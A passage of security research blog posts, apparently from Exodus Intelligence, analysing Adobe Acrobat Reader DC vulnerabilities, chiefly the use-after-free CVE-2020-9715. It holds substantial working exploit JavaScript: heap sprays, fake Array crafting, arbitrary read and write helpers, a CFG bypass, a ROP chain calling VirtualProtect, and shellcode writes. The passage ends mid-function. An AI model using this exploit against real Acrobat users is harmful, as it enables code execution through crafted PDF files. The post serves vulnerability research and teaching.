        0xff9dbd95, 0x7c063cd5, 0xe0fb800a, 0x47bb0575, 0x6a6f7213, 0xd5ff5300, 0x636c6163, 0x6578652e,
        0x00000000]


[3]

    var shellcode_size = shellcode.length * 4;
    writeUint32(rw, newStackAddr + 4 , startAddr);
    writeUint32(rw, newStackAddr + 8, startAddr);
    writeUint32(rw, newStackAddr + 0xc, shellcode_size);
    writeUint32(rw, newStackAddr + 0x10, 0x40);
    writeUint32(rw, newStackAddr + 0x14, startAddr + shellcode_size);

[4]

    for (var i = 0; i < shellcode.length; i++) {
        writeUint32(rw, startAddr+i*4, shellcode[i]);
    }

}

[5]

function hijackEIP(rw, escriptAddr) {
    var dataViewObjPtr = rw.getUint32(0xffffffff+0x1-0x8, true);

    var dvShape = readUint32(rw, dataViewObjPtr);
    var dvShapeBase = readUint32(rw, dvShape);
    var dvShapeBaseClasp = readUint32(rw, dvShapeBase);

    var stackPivotGadgetAddr = 0x2de29 + escriptAddr;

    writeUint32(rw, dvShapeBaseClasp+0x10, stackPivotGadgetAddr);

    var foo = rw.execFlowHijack;
}

In the code listing above, the function at [1] obtains the base addresses of the EScript.api and kernel32.dll modules, which are the ones required to exploit the vulnerability with the current strategy. The function at [2] is used to prepare the contents of the relocated stack, so that once the stack pivot is executed everything is ready. In particular, at [3] the address of the shellcode and the parameters to VirtualProtect are written. The address of the shellcode corresponds to the return address that the ret instruction of VirtualProtect will restore, thereby redirecting the execution flow to the shellcode. The shellcode is written at [4].

Finally, at [5], in the hijackEIP function, the getProperty function pointer of a DataView object under control is overwritten with the address of the ROP gadget used to pivot the stack, and a property of the object is accessed, which triggers the execution of getProperty.

The stack pivot gadget used is from the EScript.api module, and is listed below:

0x2382de29: mov esp, 0x5d0013c2; ret;

When the instructions listed above are executed, the stack will be relocated to 0x5d0013c2 where the previously prepared allocation would be.

Conclusion

We hope you enjoyed reading this analysis of a heap buffer-overflow and learned something new. If you’re hungry for more, go and check out our other blog posts!

The post Analysis of a Heap Buffer-Overflow Vulnerability in Adobe Acrobat Reader DC appeared first on Exodus Intelligence.

Analysis of a use-after-free Vulnerability in Adobe Acrobat Reader DC

20 April 2021 at 17:11

By Sergi Martinez

This post analyses CVE-2020-9715, a use-after-free vulnerability affecting several versions of the Adobe Acrobat and Adobe Acrobat Reader products. The vulnerability was discovered by Mark Vincent Yason, who reported it to the Zero Day Initiative (ZDI) disclosure program.

This research was inspired by a detailed blog post by ZDI that analyzed the vulnerability. The exploitation broadly follows the steps outlined in the ZDI blog post, but describes the vulnerability and exploitation steps in more detail.

Overview

A use-after-free vulnerability affects the data ESObject cache within the EScript.api module of Adobe Acrobat Reader DC. Although objects may be added to the cache using keys with ANSI or Unicode strings, objects are evicted from the cache by keys that contain only Unicode strings. This enables an attacker to cause a data ESObject to be freed, but its pointer to remain intact in the object cache entry. When the same JavaScript object is later accessed, its cache entry is found despite the corresponding data ESObject having been freed. This leads to a use-after-free condition. An attacker can exploit this vulnerability to achieve code execution by enticing a user to open a crafted PDF file.

The vulnerability analysis that follows is based on Adobe Acrobat Reader DC version 2020.009.20063 running on Windows 10 64-bit.

CVE-2020-9715

Before we dive into the vulnerability, we need to understand how embedded JavaScript is handled by Adobe Reader.

Adobe Reader has a built-in JavaScript engine based on Mozilla’s SpiderMonkey. Embedded JavaScript code in PDF files is processed and executed by the EScript.api module in Adobe Reader.

The Adobe Reader JavaScript engine uses several types of objects including ESObjects and JSObjects. ESObjects are internal to the EScript.api module and contain a pointer to the classical JavaScript objects, JSObjects.

Several kinds of ESObjects exist and among them is the data ESObject, which is a type of object used to represent embedded files and data streams. data ESObjects are uniquely identified by a key (referred to as cache_key in this post) that contains:

  • A pointer to a PDDoc object, which is an object that represents the PDF document.
  • The name of the data ESObject that is an ANSI or Unicode string containing the name of the embedded file.

References to data ESObjects are stored in a cache indexed by cache_key. When a new data ESObject is constructed with a certain name, a cache_key object is constructed with that name and is used to search the cache for the presence of the data ESObject that matches the name. If the search is a cache hit, a pointer to the data ESObject is returned. Otherwise, a new data ESObject is created and stored in the cache, and a pointer to it is returned.

The vulnerability occurs due to a mismatch in the encoding of the name string during the construction of cache_key used in the insertion and deletion phases in the lifecycle of a data ESObject. When a data ESObject is created and added to the cache, the name used in the cache_key retains the original encoding (ANSI or Unicode) found in the PDF document.

When a data ESObject is deleted from the cache, the name used in the cache_key is always encoded in Unicode. This leads to a condition where cache entries for data ESObject with ANSI names are never purged from cache; instead the cache entries retain pointers to freed data ESObjects indefinitely.

If an ANSI data ESObject is thus freed, and the code tries to create a new data ESObject with a matching name (e.g., when JavaScript code deletes this.dataObjects[0] and then accesses this.dataObjects[0]), a cache hit occurs but the pointer returned is the pointer to the ANSI-named data ESObject that was previously freed. This leads to an exploitable use-after-free condition.
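
The mismatch can be modeled in a few lines of JavaScript. This is a toy sketch, not Adobe's code: the Map-based cache, the makeKey helper, and the type constants are assumptions made for illustration. Only the asymmetry between insertion and eviction mirrors the behavior described above.

```javascript
// Toy model of the data ESObject cache (all names here are hypothetical).
var ANSI = 1, UNICODE = 2;

function makeKey(pddoc, type, name) {
    // The string type is part of the key, so "a" (ANSI) != "a" (Unicode).
    return pddoc + "|" + type + "|" + name;
}

var cache = new Map();

function insertObject(pddoc, type, name) {
    // Insertion keeps the encoding found in the PDF document.
    var obj = { name: name, freed: false };
    cache.set(makeKey(pddoc, type, name), obj);
    return obj;
}

function deleteObject(pddoc, obj) {
    // Deletion always builds a Unicode key, so ANSI entries are never evicted.
    cache.delete(makeKey(pddoc, UNICODE, obj.name));
    obj.freed = true;
}

function lookupObject(pddoc, type, name) {
    return cache.get(makeKey(pddoc, type, name));
}

var ansiObj = insertObject(1, ANSI, "attachment");
deleteObject(1, ansiObj);
// The ANSI entry survived the deletion and still points at the freed object.
var stale = lookupObject(1, ANSI, "attachment");

var unicodeObj = insertObject(1, UNICODE, "other");
deleteObject(1, unicodeObj);
// The Unicode entry was evicted as expected.
var evicted = lookupObject(1, UNICODE, "other");
```

In this model, stale is the same object that was marked as freed, while evicted is undefined.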

Code Analysis

Let's take a look at how these objects are represented under the hood, and examine where the bug exists. Code listings show decompiled C code; source code is not available for the affected product. Structure definitions, function names, etc. were obtained by reverse engineering and may not accurately reflect those defined in the source code.

Structure Definitions

The cache mechanism is implemented with the use of a variant of Binary Search Trees. A pointer to the cache is kept in a global variable at EScript+0x273AAC, which points to a structure (named here as esobject_cache_st) defined as follows:

typedef struct esobject_cache_st {
  bst_node *root_node;
  int      *node_count;
  void     *unknown;
} esobject_cache;

typedef struct bst_node_st {
  bst_node  *left;
  bst_node  *parent;
  bst_node  *right;
  int       node_type;
  cache_key *key;
  void      *esobject;
} bst_node;

A pointer to the cache_key structure is stored within each node in the cache. The cache_key structure is defined as follows:

typedef struct cache_key_st {
  void *pddoc;
  ESString *name;
} cache_key;

The cache_key structure contains the name of the embedded file in the form of an ESString structure, which is defined as follows:

typedef struct esstring_st {
  int  type;
  char *buffer;
  int  len;
  int  max_capacity;
  void *unknown1;
  void *unknown2;
} ESString;

In the structure above, the buffer member is a pointer to the string encoded in the format specified in the type member (1 for ANSI, 2 for Unicode). Its length is defined by the len member and the maximum capacity of the buffer is indicated by max_capacity. In Unicode ESString objects the buffer encoding is UTF-16 with Byte Order Mark (BOM).
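
To make the two buffer layouts concrete, the sketch below encodes the same name both ways. It rests on assumptions: "ANSI" is modeled as one byte per character, and the Unicode form is modeled as big-endian UTF-16 preceded by the FE FF byte order mark (the convention used for PDF text strings). The byte order is not stated in the analysis above. Both function names are hypothetical.

```javascript
// Model an ANSI buffer: one byte per character (assumption: Latin-1 range only).
function encodeAnsi(name) {
    var bytes = [];
    for (var i = 0; i < name.length; i++) {
        bytes.push(name.charCodeAt(i) & 0xff);
    }
    return bytes;
}

// Model a Unicode buffer: BOM followed by big-endian UTF-16 code units
// (assumption: big-endian, as in PDF text strings).
function encodeUtf16WithBom(name) {
    var bytes = [0xfe, 0xff];
    for (var i = 0; i < name.length; i++) {
        var code = name.charCodeAt(i);
        bytes.push(code >> 8, code & 0xff);
    }
    return bytes;
}

var ansiBytes = encodeAnsi("ab");             // 2 bytes
var unicodeBytes = encodeUtf16WithBom("ab");  // 2 BOM bytes + 4 data bytes
```

Even for an identical name, the two buffers differ in both length and content, which is why the type member matters whenever keys are compared.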

Comparing Cache Keys

Any operation that traverses the tree requires a key comparison function. This function is implemented at EScript+0x90770 and its code is listed below.

bool is_key_greater(cache_key *key1, cache_key *key2)
{
  ESString *name1;
  ESString *name2;

[1]

  if ( key1->pddoc != key2->pddoc )
    return (unsigned int)key1->pddoc < (unsigned int)key2->pddoc;
  name2 = key2->name;
  name1 = key1->name;
  return esstrings_compare(&name1, &name2);
}

The function first checks whether the keys belong to the same PDF document [1]. If they belong to the same PDF document then it proceeds to compare the names of the keys, which are ESString objects.

The ESString comparison function (implemented at EScript+0x45B07) is listed below.

bool esstrings_compare(ESString **name1, ESString **name2)
{
  ESString *type1;
  ESString *type2;
  bool v4;

  type1 = get_ESString_type(*name1);
  type2 = get_ESString_type(*name2);

[2]

  if ( type1 == type2 )
    v4 = (sub_23845B5E(*name1, *name2) & 0x8000u) != 0;
  else
    v4 = (int)type1 < (int)type2;
  return v4;
}

Relevant to this vulnerability is that at [2] there is a check that compares the ESString types. If they differ, the result of the function is true if type1 is less than type2. For example, when comparing two keys with the same name of different types where type1 is ANSI (1) and type2 is Unicode (2), the esstrings_compare function returns true.

When performing a lookup in the data ESObject cache, the function that implements it (EScript+0x90476) considers keys with the same name but different ESString types as different.
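
The ordering can be sketched in JavaScript to show why such keys never match. This is a simplified model, not the decompiled logic: the plain string comparison stands in for the real ESString compare routine, and the keysMatch rule (two keys match when neither orders before the other) is an assumption about how the tree lookup uses the comparator. All names are hypothetical.

```javascript
// Simplified model of the ESString ordering described above.
function esstringsCompare(name1, name2) {
    if (name1.type === name2.type) {
        return name1.text < name2.text;  // stand-in for the real string compare
    }
    return name1.type < name2.type;      // ANSI (1) orders before Unicode (2)
}

function keyOrdersBefore(key1, key2) {
    if (key1.pddoc !== key2.pddoc) {
        return key1.pddoc < key2.pddoc;
    }
    return esstringsCompare(key1.name, key2.name);
}

// Assumption: a lookup treats two keys as equal when neither orders before the other.
function keysMatch(key1, key2) {
    return !keyOrdersBefore(key1, key2) && !keyOrdersBefore(key2, key1);
}

var ansiKey = { pddoc: 1, name: { type: 1, text: "attachment" } };
var unicodeKey = { pddoc: 1, name: { type: 2, text: "attachment" } };

var sameTypeMatches = keysMatch(ansiKey, ansiKey);      // true
var mixedTypeMatches = keysMatch(ansiKey, unicodeKey);  // false
```

Because the type check runs before any character is compared, the ANSI key always orders before the Unicode key, so a lookup with one can never land on a node stored under the other.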

Deleting Cache Entries

When a data ESObject is freed, the corresponding cache entry that stores a pointer to the object is also freed. The ESObject deletion is implemented in the function at EScript+0x907B0, which is listed below.

__int16 delete_object(int a1)
{
  int v1;
  ESString *v2;
  wchar_t *v3;
  wchar_t *v4;
  esobject_cache *cache_ptr;
  cache_key key;
  int v8[3];
  int v9;

  v1 = sub_23858B70(a1);

[1]

  v2 = (ESString *)sub_23844B00(a1, "DataObject");
  v3 = (wchar_t *)v2;
  if ( v1 )
  {
    if ( !v2 )
      return 1;
    v4 = (wchar_t *)get_dataobject_name(v2);
    v8[0] = (int)v4;
    v9 = 0;
    key.pddoc = v1;
    sub_23877D42(&key.name, (ESString **)v8);
    LOBYTE(v9) = 1;
    cache_ptr = initialize_data_esobject_cache(global_cache_ptr);

[2]

    remove_key_from_cache(cache_ptr, &key);
    LOBYTE(v9) = 2;
    if ( key.name )
      sub_23845AAE((wchar_t *)key.name);
    v9 = 3;
    if ( v4 )
      sub_23845AAE(v4);
    v9 = -1;
  }
  if ( v3 )
    sub_23845AAE(v3);
  return 1;
}

The call at [1] returns a pointer to an ESString object used to create the cache_key object. This is passed to the function that removes cache nodes matching the cache_key object at [2].

The vulnerability occurs because [1] returns a pointer to an ESString object whose type is always Unicode (ESString.type = 2). However, the ESString value of the keys stored in the cache nodes keeps the type that was used in the definition of the data object in the PDF file. If that name was defined as an ANSI string in the PDF file, the cache key would also be ANSI (ESString.type = 1).

During deletion, a lookup for a cache entry whose name was defined with an ANSI ESString never succeeds, because the cache key built for the lookup always holds a Unicode ESString. This prevents the cache node from being removed, leaving a stale pointer to the freed ESObject.

Accessing Deleted Objects

When the data ESObject cache contains entries that were not removed due to the ESString type mismatch problem, any attempt to access the freed object from JavaScript retrieves the stale pointer corresponding to that entry. Therefore, any operation on that pointer causes an access to memory that was already freed, triggering the use-after-free.

The function listed below handles accesses to data ESObjects and is implemented at EScript+0x929F0.

__int16 accessDataObjects(int a1, int a2, int a3)
{
  wchar_t *v3;
  int v5;
  int v6;
  int v7;
  ESString *v8;
  int v9;
  bool v10;
  wchar_t *v11;
  int v12;
  int freed_object_retrieved;
  int v14;
  int v15[3];
  wchar_t *v16;
  wchar_t *v17;
  wchar_t *v18;
  int v19;
  int v20;

  v3 = (wchar_t *)sub_23858B70(a1);
  v16 = v3;
  if ( !v3 )
    return sub_238AB500(a1, a2, 0, 14, 0);
  v17 = (wchar_t *)sub_238401C0((int *)a1);
  v5 = sub_2387DC8A(v3, v14);
  v6 = v5;
  v7 = 0;
  if ( v5 )
    v18 = (wchar_t *)custom_calloc(v5, 4);
  else
    v18 = 0;
  v8 = new_esstring(0, 1);
  v15[2] = (int)v8;
  v20 = 0;
  v9 = 0;
  v19 = 0;
  v10 = v6 == 0;
  if ( v6 > 0 )
  {
    v11 = v18;
    _mm_lfence();
    do
    {
      sub_2387DB6D(v16, v9, (int)v8);
      v12 = sub_2383D040(v17, 1);
      *(_DWORD *)&v11[2 * v19] = v12;
      v15[0] = (int)v16;

[1]

      v15[1] = get_ESString_buffer(v8);

[2]

      freed_object_retrieved = sub_23882310(v17, "Data", (wchar_t *)v15);

[3]

      sub_2383D430(*(int **)&v11[2 * v19], freed_object_retrieved);
      v9 = v19 + 1;
      v19 = v9;
    }
    while ( v9 < v6 );
    v7 = 0;
    v10 = v6 == 0;
  }
  if ( !v10 )
    v7 = sub_2385CE40(v17, v18, v6, 1);
  sub_2383D430((int *)a3, v7);
  if ( v6 )
    (*(void (__cdecl **)(wchar_t *))(dword_23A7538C + 12))(v18);
  v20 = 1;
  if ( v8 )
    sub_23845AAE((wchar_t *)v8);
  return 1;
}

The call at [2] triggers the creation of data ESObjects based on the data object name retrieved at [1]. This causes a cache lookup that returns the ESObject pointer of the corresponding cache entry, which is then used in the call at [3].

Exploitation

We’ll now walk through how this vulnerability can be exploited to achieve arbitrary code execution. The following exploit is designed for Adobe Acrobat Reader DC version 2020.009.20063 running on Windows 10 x64.

A successful exploit strategy needs to bypass the following security mitigations on the target:

  • Address Space Layout Randomization (ASLR)
  • Data Execution Prevention (DEP)
  • Control Flow Guard (CFG)

In order to bypass all three mitigations, the following exploitation strategy is adopted:

  1. Spray a large number of ArrayBuffer objects with the correct size so they are adjacent to each other. The sprayed ArrayBuffer objects must contain a crafted fake Array object that is used to corrupt the adjacent ArrayBuffer.byteLength field (step 6).
  2. Prime the Low Fragmentation Heap (LFH) for size 0x48 (the size of the freed ESObject).
  3. Create and free the target ESObject.
  4. Spray crafted strings to allocate memory in the address used by the freed ESObject. The crafted string must contain a pointer to a predictable address where one of the fake Array objects created in step 1 would be.
  5. Trigger the ESObject reuse to obtain a handle to the fake Array in the exploit JavaScript code.
  6. Use the fake Array handle obtained in step 5 to write past the underlying ArrayBuffer boundaries and overwrite the byteLength field of the adjacent ArrayBuffer with the value 0xffffffff. This, combined with the creation of a DataView object on the corrupted ArrayBuffer allows reading from and writing to arbitrary memory addresses.
  7. Use the arbitrary read and write to write the ROP chain and shellcode.
  8. Overwrite a function pointer of the fake Array object and trigger its call to hijack the execution flow.

The following sub-sections break down the exploit code with explanations for better understanding.

Spraying ArrayBuffer Objects

When dealing with the heap, the addresses of allocations are not consistent between executions and thus cannot be hardcoded into the exploit. In order to place controlled memory regions at predictable addresses, the internals of the memory manager have to be leveraged.

The heap spray technique performs a large number of controlled allocations with the intention of having adjacent regions of controllable memory. The key to obtaining adjacent memory regions is to make the allocations of a specific size.

In JavaScript, a convenient way of making allocations in the heap whose content is completely controlled is by using ArrayBuffer objects. The memory allocated with these objects can be read from and written to with the use of DataView objects.

In order to get a heap allocation of the right size, the metadata of ArrayBuffer objects and heap chunks has to be taken into consideration. The internal representation of ArrayBuffer objects shows that the size of their metadata is 0x10 bytes. The size of the metadata of a busy heap chunk is 8 bytes.

Since the objective is to have adjacent memory regions filled with controlled data, the allocations performed must have the exact same size as the heap segment size, which is 0x10000 bytes. Therefore, the ArrayBuffer objects created during the heap spray must be of 0xffe8 bytes.

var SHIFT_ALIGNMENT = 4;
var FAKE_ARRAY_JSOBJ_ADDR = 0x40000058 + SHIFT_ALIGNMENT;
var HEAP_SEGMENT_SIZE = 0x10000
var ARRAY_BUFFER_SZ = HEAP_SEGMENT_SIZE-0x10-0x8

[1]

var arrayBufferSpray = new Array(0x8000);

function sprayArrayBuffers() {

    // Spray a large number of ArrayBuffers containing crafted data (a fake array)
    // so we end up with a fake JS array object at FAKE_ARRAY_JSOBJ_ADDR

    for (var i = 0; i < arrayBufferSpray.length; i++) {
        arrayBufferSpray[i] = new ArrayBuffer(ARRAY_BUFFER_SZ);
        var dv = new DataView(arrayBufferSpray[i]);


[2]

        // ArrayObject.shape_
        dv.setUint32(SHIFT_ALIGNMENT+0, FAKE_ARRAY_JSOBJ_ADDR+0x10, true);

        // ArrayObject.type_
        dv.setUint32(SHIFT_ALIGNMENT+4, FAKE_ARRAY_JSOBJ_ADDR+0x40, true);

        // ArrayObject.elements_
        dv.setUint32(SHIFT_ALIGNMENT+0xc, FAKE_ARRAY_JSOBJ_ADDR+0x80, true);

        // ArrayObject.shape_.base_
        dv.setUint32(SHIFT_ALIGNMENT+0x10, FAKE_ARRAY_JSOBJ_ADDR+0x20, true);

        // ArrayObject.shape_.base_.flags
        dv.setUint32(SHIFT_ALIGNMENT+0x20+0x10, 0x1000, true);

        // ArrayObject.type_.classp
        dv.setUint32(SHIFT_ALIGNMENT+0x40, FAKE_ARRAY_JSOBJ_ADDR+0x40+0x10, true);

        // ArrayObject.type_.classp.enumerate
        dv.setUint32(SHIFT_ALIGNMENT+0x40+0x10+0x1c, 0xdead1337, true);

        // ArrayObject.elements_.flags
        dv.setUint32(SHIFT_ALIGNMENT+0x80-0x10, 0, true);

        // ArrayObject.elements_.initializedLength
        dv.setUint32(SHIFT_ALIGNMENT+0x80-0x10+4, 0xffff, true);

        // ArrayObject.elements_.capacity
        dv.setUint32(SHIFT_ALIGNMENT+0x80-0x10+8, 0xffff, true);

        // ArrayObject.elements_.length
        dv.setUint32(SHIFT_ALIGNMENT+0x80-0x10+0xc, 0xffff, true);
    }
}

The exploit function listed above performs the ArrayBuffer spray. The total size of the spray defined at [1] was determined by choosing a number high enough for an ArrayBuffer to be allocated at the selected predictable address defined by the FAKE_ARRAY_JSOBJ_ADDR global variable.

Each of the sprayed ArrayBuffer objects contains a crafted fake Array object [2]. To craft a fake Array object, not all of the internal structures need to be provided. However, there are some important values that need to be chosen carefully:

  • Elements.initializedLength: The number of elements that have been initialized.
  • Elements.capacity: The number of allocated slots.
  • Elements.length: The length property of Array objects.

When the use-after-free condition is triggered, operations on the crafted Array object (set as the contents of the sprayed ArrayBuffer objects) include reading from and writing to the Array. The eventual goal is to corrupt the byteLength field of an ArrayBuffer object (which is a well-known method to obtain a read and write primitive). By ensuring that the crafted Array object allows writing past the boundaries of the underlying ArrayBuffer object and into an adjacent ArrayBuffer, the adjacent ArrayBuffer can be corrupted as desired. Therefore, the values of the Array object properties need to be bigger than the number of bytes that separate the start of the array from the next ArrayBuffer metadata.

Priming the Low Fragmentation Heap

The object that is freed in this vulnerability is 0x48 bytes in size (the size of an ESObject). Allocations of this size are likely to end up being handled by the Low Fragmentation Heap (LFH) if enough consecutive allocations of that size are performed.

In order to allocate into the address of the freed ESObject, it helps to make sure that the object is handled by the LFH, which reduces the possibility of the application uncontrollably allocating into that spot.

var lfhPrime = new Array(0x1000);

function primeLFH() {

    // Activate the LFH bucket for size 0x48 (real chunk size is 0x50) and help improve determinism.
    // We want the allocation of the UAFed object to fall in the LFH so we can claim its freed chunk more or less reliably.

[1]

    var baseString = "Prime the LFH!".repeat(100);
    for (var i = 0; i < lfhPrime.length; i++) {
        lfhPrime[i] = baseString.substring(0, 0x48 / 2 - 1).toUpperCase();
    }

[2]

    for (var i = 0; i < lfhPrime.length; i+=2) {
        lfhPrime[i] = null;
    }
}

The function listed above performs multiple allocations of size 0x48 [1] in order to activate the LFH bucket for that size. Activating the LFH for a specific size requires at least 0x11 consecutive allocations. However, since the application might require allocations of that specific size for other uses, some of the allocations are freed to reduce the possibility of it allocating into the freed ESObject spot [2].
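
The string length used in the priming loop follows from simple arithmetic. The sketch below assumes that a JavaScript string of n characters is backed by a buffer of (n + 1) * 2 bytes, that is, UTF-16 code units plus a terminating null. This assumption matches the 0x48 / 2 - 1 expression in the listing but is not confirmed independently here. The stringAllocationSize helper is hypothetical.

```javascript
// Assumption: n characters occupy (n + 1) * 2 bytes (UTF-16 plus a null terminator).
function stringAllocationSize(str) {
    return (str.length + 1) * 2;
}

var TARGET_SIZE = 0x48;  // size of the freed ESObject

// Same expression as in primeLFH(): 0x48 / 2 - 1 = 35 characters.
var sample = "Prime the LFH!".repeat(100).substring(0, TARGET_SIZE / 2 - 1);

var sampleLength = sample.length;                 // 35
var sampleBytes = stringAllocationSize(sample);   // (35 + 1) * 2 = 72 = 0x48
```

Under that assumption, each primed string lands in the same size class as the ESObject that is freed later.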

Creating and Freeing the Vulnerable Object

Once the memory is laid out, the ESObject has to be created, added into the cache, and then freed.

[1]

this.dataObjects[0].toString();

[2]

this.dataObjects[0] = null;

[3]

g_timeout = app.setTimeOut("triggerUAF()", 1000);

In the code listing above, [1] triggers the creation of the data ESObject that is stored in the object cache. Then, [2] removes the reference to it so when the Garbage Collector is triggered in [3] the ESObject is freed.

Allocating Into the Freed Spot

At this point the heap has been curated for allocation into the freed ESObject spot. To do so, a large number of allocations of size 0x48 have to be performed in order to have a chance of one landing into that spot.

[1]

var stringSpray = new Array(0x2000);

function sprayStrings() {
    // Spray strings of size 0x48/2-1 in order to eventually allocate into the spot left by the freed chunk
    var baseString = unescape(toUnescape(FAKE_ARRAY_JSOBJ_ADDR).repeat(0x48));
    for (var i = 0; i < stringSpray.length; i++) {
        stringSpray[i] = baseString.substring(0, 0x48 / 2 - 1).toLowerCase();
    }
}

The allocations are performed with a spray of the size defined at [1]. This value is double the size selected for priming the LFH, which ensures that both the free spots left by the priming and the ESObject spot are filled.

The object used in the spray is a string, as it allows easy control of the size and contents without any metadata overhead. The content of the string is the unescaped value of the address where a fake Array object is expected to have been allocated during the initial ArrayBuffer spray. The unescape function is used to deal with Unicode transformation.
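
The toUnescape helper is not shown in the listing above. A minimal sketch of what such a helper might look like follows, assuming it emits the 32-bit address as two %uXXXX escapes with the low 16-bit word first, so that the resulting UTF-16 string holds the address in little-endian byte order. The implementation is hypothetical.

```javascript
// Hypothetical helper: encode a 32-bit value as two %uXXXX escapes, low word first.
function toUnescape(value) {
    function hex16(word) {
        return ("0000" + word.toString(16)).slice(-4);
    }
    var low = value & 0xffff;
    var high = (value >>> 16) & 0xffff;
    return "%u" + hex16(low) + "%u" + hex16(high);
}

var encoded = toUnescape(0x4000005c);  // "%u005c%u4000"
var decoded = unescape(encoded);       // two UTF-16 code units: 0x005c, 0x4000
```

Repeating the encoded pattern before calling unescape, as the spray does, fills the whole string with copies of the same pointer.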

Achieving Arbitrary Read and Write

Once the predictable address occupies the spot in memory left by the freed ESObject and points to the fake Array object, an access to the data object provides a handle to that fake Array object that can be used as a normal Array. This can be achieved with the following line of code:

var fakeArrObj = this.dataObjects[0]

By carefully choosing the element of the fake Array to assign a value to, the adjacent ArrayBuffer can be corrupted. The interesting value to corrupt is the byteLength property. Following the byteLength field, the next value in memory is a pointer to the DataView object associated to the ArrayBuffer. It is important to take into account that this value can only be either a valid pointer or zero.

function getArbitraryRW(fakeArrObj) {
    var corruptedArrayBuffer = null;

[1]

    var nextABByteLengthOffset = ARRAY_BUFFER_SZ-0x10-0x70+0x8;
    fakeArrObj[nextABByteLengthOffset / 8] = 2.12199579047120666927013567069E-314;

[2]

    fakeArrObj[0] = this.addField("t", "text", 0, [0, 0, 0, 0 ]);
    fakeArrObj[0].value = "dummy1337w00t";

[3]

    for (var i = 0; i < arrayBufferSpray.length; i++) {
        if (arrayBufferSpray[i].byteLength == -1) {
            corruptedArrayBuffer = arrayBufferSpray[i];
        }
    }

[4]

    return new DataView(corruptedArrayBuffer);
}

In the code listing above, the byteLength value of the adjacent ArrayBuffer object is overwritten [1]. The double value used translates to 0xFFFFFFFF 0x00000000 in memory due to the IEEE 754 representation of double values.
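
The in-memory representation of that constant can be checked with a DataView. The sketch below is only a verification aid; the doubleToWords helper is a hypothetical name and is not part of the exploit.

```javascript
// Reinterpret a double as two little-endian 32-bit words.
function doubleToWords(value) {
    var view = new DataView(new ArrayBuffer(8));
    view.setFloat64(0, value, true);
    return [view.getUint32(0, true), view.getUint32(4, true)];
}

var words = doubleToWords(2.12199579047120666927013567069E-314);
// words[0] is 0xffffffff: the value that lands on byteLength.
// words[1] is 0: the value that lands on the following DataView pointer slot.
```

The second word being zero matters because, as noted above, the field after byteLength must hold either a valid pointer or zero.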

Aside from the ArrayBuffer corruption, a text field is created and assigned to the fake Array [2]. This is later used to leak a pointer to the AcroForm.api module, which is used to leak the icucnv58.dll module base address.

The next step is to locate the corrupted ArrayBuffer by checking the size of all the allocated buffers [3]. Finally, creating a DataView on the corrupted ArrayBuffer [4] allows reading from and writing to arbitrary memory addresses, since the size of the ArrayBuffer was set to 0xffffffff. However, the addresses specified when reading or writing memory are relative to the address where the corrupted ArrayBuffer is located. For convenience, the following helper functions were created to read and write memory using absolute addresses.

function readUint32(dataView, absoluteAddress) {
    var startAddr = FAKE_ARRAY_JSOBJ_ADDR-SHIFT_ALIGNMENT+HEAP_SEGMENT_SIZE;
    var addrOffset = absoluteAddress - startAddr;
    if (addrOffset < 0) {
        addrOffset = addrOffset + 0xffffffff + 1;
    }
    return dataView.getUint32(addrOffset, true);
}

function writeUint32(dataView, absoluteAddress, data) {
    var startAddr = FAKE_ARRAY_JSOBJ_ADDR-SHIFT_ALIGNMENT+HEAP_SEGMENT_SIZE;
    var addrOffset = absoluteAddress - startAddr;
    if (addrOffset < 0) {
        addrOffset = addrOffset + 0xffffffff + 1;
    }
    dataView.setUint32(addrOffset, data, true);
}
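
The address translation shared by both helpers can be isolated and checked on its own. In the sketch below, toRelativeOffset is a hypothetical name, and the base value is simply FAKE_ARRAY_JSOBJ_ADDR - SHIFT_ALIGNMENT + HEAP_SEGMENT_SIZE computed from the constants defined earlier.

```javascript
// Translate an absolute address into an offset relative to the corrupted buffer.
function toRelativeOffset(absoluteAddress, bufferDataAddr) {
    var offset = absoluteAddress - bufferDataAddr;
    if (offset < 0) {
        offset += 0x100000000;  // wrap around the 32-bit address space
    }
    return offset;
}

var base = 0x4000005c - 4 + 0x10000;              // 0x40010058
var above = toRelativeOffset(0x59000008, base);   // 0x18feffb0
var below = toRelativeOffset(0x40000058, base);   // 0xffff0000
```

Addresses below the buffer are reached by letting the offset wrap around, which works only because the corrupted byteLength covers the full 32-bit range.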

Writing and Executing the ROP Chain

The security mitigations present in the application determine the strategy and techniques required. ASLR and DEP force using Return Oriented Programming (ROP) combined with leaked pointers to the relevant modules. CFG forbids redirecting the execution flow via pointer overwrite to arbitrary addresses.

One way of bypassing the CFG restrictions is to redirect the execution flow to a module that was not built with CFG enabled. Adobe Acrobat Reader DC ships with some modules that do not have CFG enabled. The most convenient one for the current exploit is icucnv58.dll. Its large size (plenty of options for ROP gadgets) and the fact that it gets loaded at runtime if text fields are used (this module offers functions to handle Unicode data) make it a perfect candidate.

Taking this into account, the strategy can be the following:

  1. Obtain pointers to the relevant modules to calculate their base addresses.
  2. Pivot the stack to a memory region under our control where the addresses of the ROP gadgets can be written.
  3. Write the shellcode.
  4. Call VirtualProtect to change the shellcode memory region permissions to allow execution.
  5. Overwrite a function pointer that can be called later from JavaScript.

The following code implements the mentioned strategy:

function writePayload(dv) {

[1]

    var escriptAddrDelta = 0x275528;
    var fakeArrObjElementsPtr = readUint32(dv, FAKE_ARRAY_JSOBJ_ADDR+0xC);
    var escriptBaseAddr = readUint32(dv, readUint32(dv, fakeArrObjElementsPtr)+0xc) - escriptAddrDelta;

[2]

    var acroFormAddrDelta = 0x2827d0;
    var acroFormBaseAddr = readUint32(dv, readUint32(dv, readUint32(dv, fakeArrObjElementsPtr)+0x10)+0x34) - acroFormAddrDelta;

[3]

    var icucnv58AddrDelta = 0xc3ad8c;
    var icucnv58BaseAddr = readUint32(dv, readUint32(dv, acroFormBaseAddr+icucnv58AddrDelta)+0x10);

[4]

    var kernel32BaseAddr = readUint32(dv, escriptBaseAddr+0x273ED0);

[5]

    // Stack pivot
    //    0x95907: mov esp, 0x59000008; ret;
    var stackPivot = icucnv58BaseAddr+0x95907;

[6]

    var virtualProtectStubDelta = 0x20420;
    writeUint32(dv, 0x59000008, kernel32BaseAddr+virtualProtectStubDelta);

[7]

    // VirtualProtect parameters
    writeUint32(dv, 0x59000008+4, SHELLCODE_ADDR);
    writeUint32(dv, 0x59000008+8, SHELLCODE_ADDR);
    writeUint32(dv, 0x59000008+12, SHELLCODE_BUFFER_SZ);
    writeUint32(dv, 0x59000008+16, 0x40);
    writeUint32(dv, 0x59000008+20, fakeArrObjElementsPtr+0x8);

    // Write the shellcode
